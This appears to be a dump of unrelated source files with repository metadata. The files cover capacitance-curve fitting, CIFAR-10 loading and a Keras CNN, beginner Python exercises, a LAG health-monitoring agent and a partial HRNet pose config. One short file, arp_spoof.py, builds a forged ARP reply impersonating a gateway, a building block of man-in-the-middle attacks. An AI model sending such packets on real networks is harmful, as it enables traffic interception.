#dictionary keyed by file index; each value is
#(guess for line 1, guess for line 2, voltage bound for line 1, voltage bound for line 2)
file_dictionary = {
    0:(guess1,guess2,25,18),
    2:(guess1,guess2,25,18),
    4:(guess3,guess4,-40,-30),
}
# Even indices are closed-needle measurements; index+1 is the matching
# open-needle (baseline) file.
for index in [0,2,4]:
    data_needle = np.loadtxt(file[index],skiprows=1) #data from closed needle files
    data_open_needle = np.loadtxt(file[index+1],skiprows=1) #data from open needle files
    source_voltage = data_needle[:,0] #reads column source voltage
    #subtracts baseline from main data and calculates the true capacitances in pF
    true_capacitance1 = (data_needle[:,1]-data_open_needle[:,1])*1e12
    true_capacitance2 = (data_needle[:,3]-data_open_needle[:,3])*1e12
    true_capacitance3 = (data_needle[:,5]-data_open_needle[:,5])*1e12
    #print(true_capacitance1[0],true_capacitance2[0],true_capacitance3[0])
    print('You are now looking at file -- ',file[index])
    plt.figure()
    #plotting 1/c^2 vs source voltage
    plt.plot(source_voltage,1/(true_capacitance1)**2)
    plt.plot(source_voltage,1/(true_capacitance2)**2)
    plt.plot(source_voltage,1/(true_capacitance3)**2)
    plt.suptitle('Detector True Capacitance vs. Bias Voltage')
    plt.xlabel('Bias Voltage (V)')
    plt.ylabel('Capacitance$^{-2}$ in (pF$^{-2}$)')
    #creates mask with voltage values in absolute forms to fix range of each straight line
    v1_index = np.argmax(np.abs(source_voltage) > np.abs(file_dictionary[index][2]))
    v2_index = np.argmax(np.abs(source_voltage) > np.abs(file_dictionary[index][3]))
    #using mask to generate range for line fitting later
    new_source_voltage1 = source_voltage[v1_index:]
    new_source_voltage2 = source_voltage[:v2_index]
    new_source_voltage3 = source_voltage[:v1_index]
    new_capacitance1 = true_capacitance1[v1_index:]
    # NOTE(review): both fit ranges slice true_capacitance1; confirm the second
    # line is meant to use channel 1 as well (not true_capacitance2).
    new_capacitance2 = true_capacitance1[:v2_index]
    #fits first straight line
    g1,cov = curve_fit(straight_lines,new_source_voltage1,1/(new_capacitance1)**2,file_dictionary[index][0])
    plt.plot(source_voltage,straight_lines(source_voltage,g1[0],g1[1]))
    #fits second straight line
    g2,cov = curve_fit(straight_lines,new_source_voltage2,1/(new_capacitance2)**2,file_dictionary[index][1])
    plt.plot(new_source_voltage3,straight_lines(new_source_voltage3,g2[0],g2[1]))
    #calculating depletion voltage by equating the straight lines at the intersection point
    depletion_voltage = (g2[1]-g1[1])/(g1[0]-g2[0])
    plt.axvline(depletion_voltage) #drops a vertical line from intersection to the X-axis
    print('The full depletion voltage calculated is =',depletion_voltage)
    # NOTE(review): the same filename is written on every loop iteration,
    # so only the last figure survives on disk -- confirm intended.
    plt.savefig('figure3.pdf', bbox_inches = 'tight')
    plt.show()
|
[
"shirajum.monira@helsinki.fi"
] |
shirajum.monira@helsinki.fi
|
6e0adea63df3926229b270673ba36e756fba28fd
|
a2e58b24f99191c209a5c5dfdc94ca44612e11af
|
/objective_func/tf_models/setup_cifar.py
|
999ae910edf867e43688c29898654642d2301bd7
|
[
"MIT"
] |
permissive
|
happyxzw/BayesOpt_Attack
|
a74d624c89fe2cb0d1dcb9435c769a197086cb3d
|
cec6c4dfede2f3492d1e5cb8dd4cdacee4059f33
|
refs/heads/master
| 2022-10-19T08:55:51.653820
| 2020-06-14T05:14:46
| 2020-06-14T05:14:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,044
|
py
|
## setup_cifar.py -- cifar data and model loading code
##
## Copyright (C) 2016, Nicholas Carlini <nicholas@carlini.com>.
##
## Original copyright license follows.
import tensorflow as tf
import numpy as np
import os
import pickle
import gzip
import pickle
import urllib.request
from tensorflow.contrib.keras.api.keras.models import Sequential
from tensorflow.contrib.keras.api.keras.layers import Dense, Dropout, Activation, Flatten
from tensorflow.contrib.keras.api.keras.layers import Conv2D, MaxPooling2D
from tensorflow.contrib.keras.api.keras.models import load_model
def load_batch(fpath, label_key='labels'):
    """Load one pickled CIFAR-10 batch.

    fpath     -- path to a pickled batch dict (bytes-keyed, as shipped in
                 the CIFAR-10 python distribution).
    label_key -- dict key (after decoding) that holds the label list.

    Returns (images, one_hot_labels): images are float32 NHWC in
    [-0.5, 0.5]; labels are an (N, 10) one-hot matrix.
    """
    # Close the file deterministically instead of leaking the handle.
    with open(fpath, 'rb') as f:
        d = pickle.load(f, encoding="bytes")
    # Re-key from bytes to str.  Iterate over a snapshot: deleting and adding
    # keys while iterating the live dict raises RuntimeError on Python 3.
    for k, v in list(d.items()):
        del d[k]
        d[k.decode("utf8")] = v
    data = d["data"]
    labels = d[label_key]
    # CIFAR stores each image as a flat CHW row; convert to NHWC floats.
    data = data.reshape(data.shape[0], 3, 32, 32)
    final = np.zeros((data.shape[0], 32, 32, 3), dtype=np.float32)
    final[:, :, :, 0] = data[:, 0, :, :]
    final[:, :, :, 1] = data[:, 1, :, :]
    final[:, :, :, 2] = data[:, 2, :, :]
    final /= 255
    final -= .5
    # One-hot encode the labels.  The original built this matrix and then
    # returned the raw label list, leaving labels2 dead -- return the
    # one-hot matrix so callers get encoded labels.
    labels2 = np.zeros((len(labels), 10))
    labels2[np.arange(len(labels2)), labels] = 1
    return final, labels2
def load_batch(fpath, num_records=10000):
    """Load one raw CIFAR-10 binary batch file.

    fpath       -- path to a data_batch_N.bin / test_batch.bin file.
    num_records -- number of records to read (default 10000, the size of a
                   standard CIFAR-10 batch; exposed so partial files can be
                   read too).

    Each record is one label byte followed by 3072 pixel bytes (CHW order).
    Returns (images, labels): images are (N, 32, 32, 3) floats in
    [-0.5, 0.5]; labels are an (N, 10) one-hot matrix.
    """
    # Read the whole file once and close the handle (the original leaked it).
    with open(fpath, "rb") as fh:
        raw = fh.read()
    size = 32 * 32 * 3 + 1
    labels = []
    images = []
    for i in range(num_records):
        # np.frombuffer replaces np.fromstring, which is deprecated and
        # warns when given binary data.
        arr = np.frombuffer(raw[i * size:(i + 1) * size], dtype=np.uint8)
        lab = np.identity(10)[arr[0]]                      # one-hot label
        img = arr[1:].reshape((3, 32, 32)).transpose((1, 2, 0))  # CHW -> HWC
        labels.append(lab)
        images.append((img / 255) - .5)
    return np.array(images), np.array(labels)
class CIFAR:
    """CIFAR-10 data set loader (downloads the binary distribution if absent).

    Exposes train_data/train_labels, validation_data/validation_labels
    (the first 5000 training images) and test_data/test_labels.
    """
    # 78% accuracy
    def __init__(self, folder_path=None):
        # NOTE(review): folder_path is interpolated directly into paths, so
        # it must end with '/'; the default None would produce the literal
        # prefix "None" -- confirm callers always pass a real path.
        train_data = []
        train_labels = []
        # Download and unpack the official binary archive on first use.
        if not os.path.exists(f"{folder_path}cifar-10-batches-bin"):
            urllib.request.urlretrieve("https://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz",
                                       "cifar-data.tar.gz")
            os.popen(f"tar -xzf cifar-data.tar.gz").read()
        # Concatenate the five training batches.
        for i in range(5):
            r,s = load_batch(f"{folder_path}cifar-10-batches-bin/data_batch_"+str(i+1)+".bin")
            train_data.extend(r)
            train_labels.extend(s)
        train_data = np.array(train_data,dtype=np.float32)
        train_labels = np.array(train_labels)
        self.test_data, self.test_labels = load_batch(f"{folder_path}cifar-10-batches-bin/test_batch.bin")
        # Hold out the first 5000 training images as a validation split.
        VALIDATION_SIZE = 5000
        self.validation_data = train_data[:VALIDATION_SIZE, :, :, :]
        self.validation_labels = train_labels[:VALIDATION_SIZE]
        self.train_data = train_data[VALIDATION_SIZE:, :, :, :]
        self.train_labels = train_labels[VALIDATION_SIZE:]
class CIFARModel:
    """Keras CNN for CIFAR-10: two conv-conv-pool stages, then two dense layers.

    restore     -- optional path to saved weights to load into the model.
    session     -- accepted for interface compatibility; unused here.
    use_softmax -- when True the model outputs probabilities, otherwise logits.
    """
    def __init__(self, restore=None, session=None, use_softmax=False):
        self.num_channels = 3
        self.image_size = 32
        self.num_labels = 10
        # restore = '/data/engs-bayesian-machine-learning/sedm4615/TF_BO_Black-box_Attack/objective_func/cifar'
        model = Sequential()
        model.add(Conv2D(64, (3, 3),
                         input_shape=(32, 32, 3)))
        model.add(Activation('relu'))
        model.add(Conv2D(64, (3, 3)))
        model.add(Activation('relu'))
        model.add(MaxPooling2D(pool_size=(2, 2)))
        model.add(Conv2D(128, (3, 3)))
        model.add(Activation('relu'))
        model.add(Conv2D(128, (3, 3)))
        model.add(Activation('relu'))
        model.add(MaxPooling2D(pool_size=(2, 2)))
        model.add(Flatten())
        model.add(Dense(256))
        model.add(Activation('relu'))
        model.add(Dense(256))
        model.add(Activation('relu'))
        # Final layer: one unit per class; logits unless use_softmax is set.
        model.add(Dense(10))
        if use_softmax:
            model.add(Activation('softmax'))
        if restore:
            model.load_weights(restore)
        self.model = model
    def predict(self, data):
        # Return the model's output tensor (logits or probabilities) for `data`.
        return self.model(data)
if __name__ == '__main__':
    # Smoke test: download (if needed) and load the CIFAR-10 data set.
    CIFAR(folder_path='./')
|
[
"robin@robots.ox.ac.uk"
] |
robin@robots.ox.ac.uk
|
1711c46f73e2f5cfe6d3138100ac46ed49c83bdc
|
22672390a8040077200f766ac3ad0bb11d78b5b3
|
/stuff/arp_spoof.py
|
4ccd3752524cff0f62d2d007c4c57e22b12b77ed
|
[] |
no_license
|
shadowsax/NetworkOpen
|
2f469dfdf43b5f2ee039566a24c56973a6027a5a
|
a44bd6bf88cab9880ec2df5eaec8d3e3d7173be3
|
refs/heads/master
| 2020-05-04T19:29:29.107654
| 2019-04-04T20:50:34
| 2019-04-04T20:50:34
| 179,396,111
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 122
|
py
|
import scapy.all as scapy
# Craft (but do not send) an ARP reply (op=2) addressed to 192.168.2.173
# claiming to come from 192.168.2.1 -- the classic ARP-spoofing packet.
packet = scapy.ARP(op=2, pdst="192.168.2.173", hwdst="80:d6:05:1d:3f:6d", psrc="192.168.2.1")
|
[
"shadowsax@protonmail.com"
] |
shadowsax@protonmail.com
|
dfefa586f24a0d17af8b85ac68f93b93cde62f5b
|
cec57a923feaea6de6750dab0e76fbdca6ee7349
|
/forelse.py
|
d53a4809d5424f3fa970ce970b325529b85df41d
|
[] |
no_license
|
FlorentRu/Python-Programming-Developement-
|
ba712ea19bb572fb0490c247898a76e38442b57e
|
039c8942d92fbca5927ebc812c1d634bac18f35e
|
refs/heads/master
| 2021-06-27T09:07:48.073928
| 2020-11-17T00:44:42
| 2020-11-17T00:44:42
| 186,523,079
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 428
|
py
|
# Classify 10..19 as prime or composite using Python's for/else:
# the else branch runs only when the inner loop finishes WITHOUT break.
for num in range(10,20): #to iterate between 10 to 20
    for i in range(2,num): #to iterate on the factors of the number
        if num%i == 0: #to determine the first factor
            j=num/i #the second factor (a float under Python 3; %d truncates it when printing)
            print ('%d equals %d * %d' % (num,i,j))
            break #to move to the next number, the #first FOR
    else: # no divisor found, so the inner loop never hit break
        print(num, 'is a prime number')
|
[
"noreply@github.com"
] |
FlorentRu.noreply@github.com
|
0e0d5fc4dc4af295ea7ee55998e88442fbf2274f
|
8c4b11d129754f4b792862abfc451f2fb598bdac
|
/2week.py
|
3567ec6587d5e3c1f339111d8a3c409046343013
|
[] |
no_license
|
cpti372/Python
|
2b523ba655d6cf8819c1302c34c9057934313df4
|
5dffaf441e1c1620746806ea4122b4fd89b2ee99
|
refs/heads/master
| 2023-01-24T02:51:53.802184
| 2020-11-18T06:23:07
| 2020-11-18T06:23:07
| 144,700,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,651
|
py
|
# Week-2 practice exercises (tuples, dicts, sets, lists); each "#NNN"
# comment marks an exercise number from the course handout.
#107: creating tuples (with and without parentheses)
myTup=(1,2,3)
print(myTup)
myTup=('this is tuple',23.21,(1,2,3))
print(myTup)
myTup='소괄호 없이도 튜플',1.22,'을 만들수 잇음'
print(myTup)
memoryview  # NOTE(review): stray name lookup with no effect -- likely leftover
#108: indexing, repetition, and mutating a list nested inside a tuple
my=('a','b','c','d')
print(my)
print(my[1])
Tu_1=(1,2,3)
print(Tu_1*2)
Tu_2=(10,20,[1,2,3])
Tu_2[2][1]=4  # the tuple is immutable, but the list inside it is not
print(Tu_2)
#109: summing tuple elements with a loop
Tu_3=(1,2,3,4,5,6,7,8,9,10)
tot=0
for i in Tu_3:
    tot+=i
print(tot)
#110: sorted() and + return new objects; the original tuple is unchanged
myTup2=('kim','lee','oark','choid')
print(myTup2)
print(sorted(myTup2))
print(myTup2+('oh','i'))
print(myTup2)
print(type(myTup2))
#111: index(), count(), membership, and a tuple from a generator expression
a=(10,20,30,20,30,40)
print(a.index(10),a.index(20),a.index(30))
print(a.count(20),a.count(30),a.count(40))
print(10 in a)
b=tuple(i for i in range(10) if i%2==0)
print(b)
#112: dict insert, update, and delete
x={'a':10,'b':20,'c':30}
print('초기상태:',x)
x['d']=40
print('d추가:',x)
x['b']=40
print('b 수정:',x)
del(x['c'])
print(x)
x['a']=20
print(x)
#113: building dicts from pair sequences (two-char strings also work as pairs)
list1=[['a','b'],['c','d']]
print(dict(list1))
list2=['12','34','56']
print(dict(list2))
#114: dict methods
ht={'chenle':178,'jisung':180}
print(ht.get('chenle'))
ht['jeno']=176
print(ht)
a=ht.pop('jeno') # remove the entry by key and return its value
print(a,ht)
ht['robin']=146
b=ht.popitem()
print(b,ht)
nht={'jaemin':175,'renjun':174}
ht.update(nht)# merge another dict's entries into ht
print(ht)
print(ht.keys())# view of the dict's keys
print(ht.values())# view of the dict's values
print(ht.items())# view of (key, value) pairs
#115: get() lookups on a profile dict
chenle={'ht':'178cm','age':21,'birth':'11월','group':'nctdream'}
print('chenle','is',chenle.get('ht'))
print('chenle belongs to',chenle.get('group'))
#116
chenle={'korean':100,'English':98,'math':98,'science':98}
# NOTE(review): despite the name, this sums only two subjects and never
# divides -- it is not an average.
average=(chenle['korean']+chenle['math'])
print(average)
#118: look up the first key of a dict and echo its value
nct={'chenle':'vocal','js':'dance','mark':'leader'}
var=list(nct.keys())[0]
result=nct[var]
input('nct 이름:')  # NOTE(review): the typed name is read but never used
print('{}is {} player'.format(var,result))
#119: mean of the dict's values
chengji={'won':50,'hoo':60,'su':100}
average=(sum(chengji.values())/len(chengji))
print(average)
#120: set literals; duplicates collapse automatically
myset={1,2,3}
print(myset)
print(type(myset))
myset={'ice',1.2,(1,3,5)}
print(myset)
myset={1,2,3,2,3,2,2}
print(myset)
#121: set algebra methods
a={1,2,3,5,6,8}
b={1,3,4,5,6,7}
print(a.union(b))
print(a.intersection(b))
print(a.difference(b))
print(a.symmetric_difference(b))# elements in exactly one of the two sets
#122: mutating sets: add/update/pop/discard/remove
myset={1,3,5}
print(myset)
myset.add('A')
print(myset)
myset.update({1,3},[2,3])
print(myset)# expected: {1, 2, 3, 5, 'A'} (order is arbitrary)
print()
print(myset.pop())  # removes and returns an arbitrary element
print(myset)
myset={'apple','melon','strawberry','grape'}
print(myset)
print()
myset.discard('apple')  # no error if the element is absent
print(myset)
myset.remove('grape')   # raises KeyError if the element is absent
print(myset)
#123: superset/subset tests
A={10,20,70,90}
print({10,20,70,80,90}.issuperset(A)) # does the left set contain every element of A?
print({20,30,50}<=A) # is the left set a subset of A?
#124: membership and len() on sets (re-adding an element changes nothing)
animals={'cat','dog'}
print('cat'in animals)
print('fish' in animals)
animals.add('fish')
print(len(animals))
animals.add('cat')
print(len(animals))
#125: set() constructor plus update/remove
myset=set([1,2,3,4,5])
print(myset)
myset.update({7,11,'Ferran'})
myset.remove(1)
print(myset)
#126: set operators: ^ symmetric difference, | union, & intersection
A={1,3,4,6}
B={2,3,5,6}
print(A^B)
print(A|B)
print((A^B)|(A&B))
print(A<={1,3,4,5,6})
#126 (duplicate exercise number in the handout): intersection via &
a={1,2,4,8,16}
b={1,2,15,3,10,5,6,30}
print(a&b)
#128: read space-separated integers and print the maximum
num=list((input().split(' ')))
for i in range(len(num)):
    num[i]=int(num[i])
max_num=max(num)
print(max_num)
#129: collect the strings of length exactly 5
a=['aloha','b','cdfdfdfd','defee','edfdfdf','fffff','ggggg','hhh','e']
b=[]
for i in a:
    if(len(i)==5):
        b.append(i)
print(b)
#130: sort ascending, then print in reverse order
list1=['a','c','d','b','e']
print(list1)
l=sorted(list1)
print(list(reversed(l)))
#131: per-student averages of three subject dicts
a={'math':76,'science':89,'eng':93}
b={'math':88,'science':87,'eng':100}
c={'math':86,'science':93,'eng':82}
av_1=(sum(a.values())/len(a))
av_2=(sum(b.values())/len(b))
av_3=(sum(c.values())/len(c))
print(av_1,int(av_2),av_3)
|
[
"noreply@github.com"
] |
cpti372.noreply@github.com
|
7f7882026eb8f9eccdacaed98be5b29d94c8538c
|
6a61ebf5eaa7731384faf62b804b715ea9f6d594
|
/conditional_statements_the_challenge.py
|
4764d2a073b9d3e981e3afb92741a8ccf2b556bf
|
[] |
no_license
|
neonblueflame/wwcode-python
|
1afb3532fa9cdbf4a3984aa558c85abee99c808c
|
301789bff003c3e29b8280a3041b39e8b934e3d8
|
refs/heads/master
| 2020-06-28T03:37:39.801791
| 2019-08-14T11:14:28
| 2019-08-14T11:14:28
| 200,133,757
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,160
|
py
|
""" Challenge
Author:
Description: Aling Nena stores her soft drink stock on two refrigerators.
She stores Coke, Sprite and Royal on her Sari-sari store's refrigerator while
RC and 7UP can be found on her house's refrigerator.
Help Aling Nena to properly respond to her customer
when buying softdrinks.
The reply will depend if the soft drink brand is on the store's ref,
on the house's ref or none. If the customer buys a soft drink brand that is:
1. stored on the store, she will respond 'Got it!'
2. stored on the house, she will respond 'Please wait for a while!'
3. not sold by her, she will respond 'Sorry we do not sell that. We only
have <input here the soft drink brands>'
"""
# Where each soft-drink brand is stored (lower-case for comparison).
ref_house = ["rc", "7up"]
ref_store = ["coke", "sprite", "royal"]
customer_order = input("Hi! What soft drink brand do you want? ")
# Normalise once so the two membership tests share the same value.
order = customer_order.lower()
if order in ref_store:
    print("Got it!")
elif order in ref_house:
    print("Please wait for a while!")
else:
    # List every brand we do carry: house brands upper-cased,
    # store brands title-cased (matches the original output exactly).
    available = ", ".join(ref_house).upper() + ", " + ", ".join(ref_store).title()
    print("Sorry we do not sell that. We only have " + available + ".")
|
[
"4207002+neonblueflame@users.noreply.github.com"
] |
4207002+neonblueflame@users.noreply.github.com
|
fce993d8920b28df3ac58d79bdd0e33f3a657784
|
38038eef797c36cfc5a1a8514f7befbf0258a6b3
|
/agents/LAG/8400/lag_health_monitor.2.0.py
|
ccdbfc955b156801e7817cb7f7ac4c206da1f144
|
[
"Apache-2.0"
] |
permissive
|
nishanthprakash-hpe/nae-scripts
|
7dcb20c44cfa600fc55918d27345a26c7af0c553
|
bf14e5155308683d59e7a95d21436a767d9132a8
|
refs/heads/master
| 2020-03-23T20:40:14.851409
| 2018-07-24T02:07:14
| 2018-07-24T02:07:14
| 142,054,671
| 0
| 0
|
Apache-2.0
| 2018-07-23T18:40:13
| 2018-07-23T18:40:12
| null |
UTF-8
|
Python
| false
| false
| 7,953
|
py
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Agent manifest consumed by the NAE framework at script load time.
Manifest = {
    'Name': 'lag_health_monitor',
    'Description': 'LAG status monitoring agent using PSPO',
    'Version': '2.0',
    'Author': 'Aruba Networks'
}
# All eight LAG-name parameters share an identical schema, so generate
# them instead of repeating the same literal eight times. The resulting
# dict (keys lag_name_1 .. lag_name_8, each with its own value dict) is
# exactly what the hand-written version produced.
ParameterDefinitions = {
    'lag_name_' + str(index): {
        'Name': 'Name of the LAG to be monitored',
        'Description': 'Name of the LAG for which status is to be monitored',
        'Type': 'string',
        'Default': ''
    }
    for index in range(1, 9)
}
class Agent(NAE):
    """NAE agent that monitors forwarding/blocking state of up to eight LAGs.

    For every configured ``lag_name_<i>`` parameter it creates REST
    monitors on ``forwarding_state.forwarding`` and
    ``forwarding_state.blocking_layer`` plus rules that raise a CRITICAL
    alert when a LAG stops forwarding because of the AGGREGATION layer,
    and clear it once no LAG remains critical.
    """

    def __init__(self):
        # Concatenated ids of LAGs currently critical (see
        # report_alert_status for how this string is maintained).
        self.variables['critical_lags'] = ''
        # Last observed forwarding_state.forwarding value ('true'/'false').
        self.variables['forwarding'] = ''
        # Last observed "blocked by AGGREGATION layer" flag ('true'/'false').
        self.variables['blocked_by_aggregation'] = ''
        self.setup_lag_status_monitors()

    def setup_lag_status_monitors(self):
        """Create monitors and rules for every non-empty LAG parameter.

        BUG FIX: the loop previously ran over ``range(1, 8)`` and so
        silently ignored ``lag_name_8`` even though eight parameters are
        declared in ParameterDefinitions; ``range(1, 9)`` covers all eight.
        """
        for i in range(1, 9):
            lag_var = 'lag_name_' + str(i)
            lag_value = self.params[lag_var].value
            if lag_value:
                # Monitor 1: is the port forwarding traffic?
                lag_fwd_var = 'lag_fwd' + str(i)
                uri1 = '/rest/v1/system/ports/{}?' \
                    'attributes=forwarding_state.forwarding'
                lag_fwd_monitor = Monitor(
                    uri1,
                    'LAG Forwarding State',
                    [self.params[lag_var]])
                setattr(self, lag_fwd_var, lag_fwd_monitor)
                # Rule: forwarding went true -> false (LAG went down).
                lag_rule_var_1 = 'lag_rule_1' + str(i)
                lag_rule_1 = Rule('Port Forwarding is false')
                lag_rule_1.condition(
                    'transition {} from "true" to "false"',
                    [lag_fwd_monitor])
                lag_rule_1.action(self.status_transition_action)
                setattr(self, lag_rule_var_1, lag_rule_1)
                # Rule: forwarding went false -> true (LAG recovered).
                lag_rule_var_2 = 'lag_rule_2' + str(i)
                lag_rule_2 = Rule('Port Forwarding is back to normal')
                lag_rule_2.condition(
                    'transition {} from "false" to "true"',
                    [lag_fwd_monitor])
                lag_rule_2.action(self.status_transition_action)
                setattr(self, lag_rule_var_2, lag_rule_2)
                # Monitor 2: which layer (if any) is blocking forwarding?
                lag_blk_var = 'lag_blk' + str(i)
                uri3 = '/rest/v1/system/ports/{}?' \
                    'attributes=forwarding_state.blocking_layer'
                lag_blk_monitor = Monitor(
                    uri3,
                    'Port Blocking Layer',
                    [self.params[lag_var]])
                setattr(self, lag_blk_var, lag_blk_monitor)
                # Rules: blocked / not blocked by the AGGREGATION layer.
                lag_rule_var_3 = 'lag_rule_3' + str(i)
                lag_rule_3 = Rule(
                    'Forwarding state is blocked by AGGREGATION layer')
                lag_rule_3.condition('{} == "AGGREGATION"', [lag_blk_monitor])
                lag_rule_3.action(self.blocking_layer_action)
                setattr(self, lag_rule_var_3, lag_rule_3)
                lag_rule_var_4 = 'lag_rule_4' + str(i)
                lag_rule_4 = Rule(
                    'Forwarding state is not blocked by AGGREGATION layer')
                lag_rule_4.condition('{} != "AGGREGATION"', [lag_blk_monitor])
                lag_rule_4.action(self.blocking_layer_normal)
                setattr(self, lag_rule_var_4, lag_rule_4)

    def status_transition_action(self, event):
        """Rule callback: record the new forwarding value, then re-evaluate."""
        # event['labels'] looks like "<key>=<lag_id>,..."; keep the id.
        lag_data = event['labels']
        lag_data = lag_data.split(",")[0]
        _, lag_id = lag_data.split("=")
        event_data = event['value']
        self.logger.info(event['value'])
        self.variables['forwarding'] = str(event_data)
        self.logger.info("forwarding:" + str(self.variables['forwarding']))
        self.report_alert_status(lag_id)

    def blocking_layer_action(self, event):
        """Rule callback: forwarding is blocked by the AGGREGATION layer."""
        lag_data = event['labels']
        lag_data = lag_data.split(",")[0]
        _, lag_id = lag_data.split("=")
        self.variables['blocked_by_aggregation'] = 'true'
        self.logger.info(
            "Blocking layer:" + str(self.variables['blocked_by_aggregation']))
        self.report_alert_status(lag_id)

    def blocking_layer_normal(self, event):
        """Rule callback: forwarding is no longer blocked by AGGREGATION."""
        lag_data = event['labels']
        lag_data = lag_data.split(",")[0]
        _, lag_id = lag_data.split("=")
        self.variables['blocked_by_aggregation'] = 'false'
        self.report_alert_status(lag_id)

    def report_alert_status(self, lag_id):
        """Raise CRITICAL while any LAG is down-and-blocked; clear otherwise.

        NOTE(review): critical_lags is one concatenated string, so the
        membership tests below are substring checks — e.g. 'lag1' would
        match inside 'lag10'. Left as-is to preserve existing behavior.
        """
        if (self.variables['forwarding'] == 'false') and \
                (self.variables['blocked_by_aggregation'] == 'true'):
            self.update_alert_level(AlertLevel=AlertLevel.CRITICAL)
            if lag_id not in self.variables['critical_lags']:
                critical_lag_list = self.variables['critical_lags']
                # Adding lag_id to critical lag(s) list.
                self.variables['critical_lags'] = critical_lag_list + lag_id
                self.logger.debug(str(self.variables['critical_lags']))
                ActionSyslog('%s is down' % (lag_id))
                ActionCLI('show lacp aggregates %s' % (lag_id))
        else:
            if lag_id in self.variables['critical_lags']:
                critical_lag_list = self.variables['critical_lags']
                # Removing lag_id from critical lag(s) list.
                critical_lag_list = critical_lag_list.replace(lag_id, '')
                self.variables['critical_lags'] = critical_lag_list
                self.logger.debug(
                    'Unset the previous status for lag id' + lag_id)
                ActionSyslog('%s is up' % (lag_id))
            self.logger.debug(self.variables['critical_lags'])
            # No critical LAGs left: clear the agent alert.
            if not self.variables['critical_lags']:
                self.update_alert_level(AlertLevel=AlertLevel.NONE)

    def update_alert_level(self, AlertLevel):
        """Set the agent alert level only when it actually changes."""
        if self.get_alert_level() is not AlertLevel:
            self.set_alert_level(AlertLevel)
            self.logger.debug('CURRENT ALERT LEVEL:' +
                              str(self.get_alert_level()))
|
[
"nishanth.prakash@hpe.com"
] |
nishanth.prakash@hpe.com
|
27c3f2d7d17692197f2710282816e3a9c39e727d
|
1082cee55e32fa76859666aa011428bf979182ea
|
/pose/configs/animal/hrnet/horse10/hrnet_w32_horse10_256x256-split2.py
|
5de3a1afca5c8fe0426d03c24c6ee4857fc01faf
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
cvsch/HRFormer
|
f7a96d8620f87986cf10c74fe4f47d5b7106d732
|
9e6ce958ba502354dff748846d6d98f682f5f9d1
|
refs/heads/main
| 2023-08-20T21:29:51.448485
| 2021-10-19T01:20:02
| 2021-10-19T01:20:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,689
|
py
|
log_level = 'INFO'
load_from = None
resume_from = None
dist_params = dict(backend='nccl')
workflow = [('train', 1)]
# Save a checkpoint every 5 epochs.
checkpoint_config = dict(interval=5, create_symlink=False)
# Evaluate PCK every 10 epochs; PCK is also the model-selection metric.
evaluation = dict(interval=10, metric='PCK', key_indicator='PCK')
optimizer = dict(
    type='Adam',
    lr=5e-4,
)
optimizer_config = dict(grad_clip=None)
# learning policy: linear warmup, then step decay at epochs 170 and 200
lr_config = dict(
    policy='step',
    warmup='linear',
    warmup_iters=500,
    warmup_ratio=0.001,
    step=[170, 200])
total_epochs = 210
log_config = dict(
    interval=1,
    hooks=[
        dict(type='TextLoggerHook'),
        # dict(type='TensorboardLoggerHook')
    ])
# Horse-10 keypoint channels. NOTE(review): num_output_channels is 22
# but only 21 indices are listed below (index 20 is skipped) — confirm
# that joint 20 is intentionally unused.
channel_cfg = dict(
    num_output_channels=22,
    dataset_joints=22,
    dataset_channel=[
        [
            0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18,
            19, 21
        ],
    ],
    inference_channel=[
        0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
        21
    ])
# model settings
# Top-down pose estimator: HRNet-W32 backbone (OpenMMLab pretrained
# weights) with a 1x1-conv head and no deconv layers — HRNet already
# outputs high-resolution features.
model = dict(
    type='TopDown',
    pretrained='https://download.openmmlab.com/mmpose/'
    'pretrain_models/hrnet_w32-36af842e.pth',
    backbone=dict(
        type='HRNet',
        in_channels=3,
        extra=dict(
            stage1=dict(
                num_modules=1,
                num_branches=1,
                block='BOTTLENECK',
                num_blocks=(4, ),
                num_channels=(64, )),
            stage2=dict(
                num_modules=1,
                num_branches=2,
                block='BASIC',
                num_blocks=(4, 4),
                num_channels=(32, 64)),
            stage3=dict(
                num_modules=4,
                num_branches=3,
                block='BASIC',
                num_blocks=(4, 4, 4),
                num_channels=(32, 64, 128)),
            stage4=dict(
                num_modules=3,
                num_branches=4,
                block='BASIC',
                num_blocks=(4, 4, 4, 4),
                num_channels=(32, 64, 128, 256))),
    ),
    keypoint_head=dict(
        type='TopDownSimpleHead',
        in_channels=32,
        out_channels=channel_cfg['num_output_channels'],
        num_deconv_layers=0,
        extra=dict(final_conv_kernel=1, ),
        loss_keypoint=dict(type='JointsMSELoss', use_target_weight=True)),
    train_cfg=dict(),
    # Inference: average predictions over the flipped image as well.
    test_cfg=dict(
        flip_test=True,
        post_process='default',
        shift_heatmap=True,
        modulate_kernel=11))
# Shared data configuration: 256x256 inputs, 64x64 heatmaps.
data_cfg = dict(
    image_size=[256, 256],
    heatmap_size=[64, 64],
    num_output_channels=channel_cfg['num_output_channels'],
    num_joints=channel_cfg['dataset_joints'],
    dataset_channel=channel_cfg['dataset_channel'],
    inference_channel=channel_cfg['inference_channel'])
# Training augmentation: random flip, random scale/rotation, affine
# crop, standard ImageNet mean/std normalisation, Gaussian heatmap
# targets (sigma=2).
train_pipeline = [
    dict(type='LoadImageFromFile'),
    dict(type='TopDownRandomFlip', flip_prob=0.5),
    dict(
        type='TopDownGetRandomScaleRotation', rot_factor=40, scale_factor=0.5),
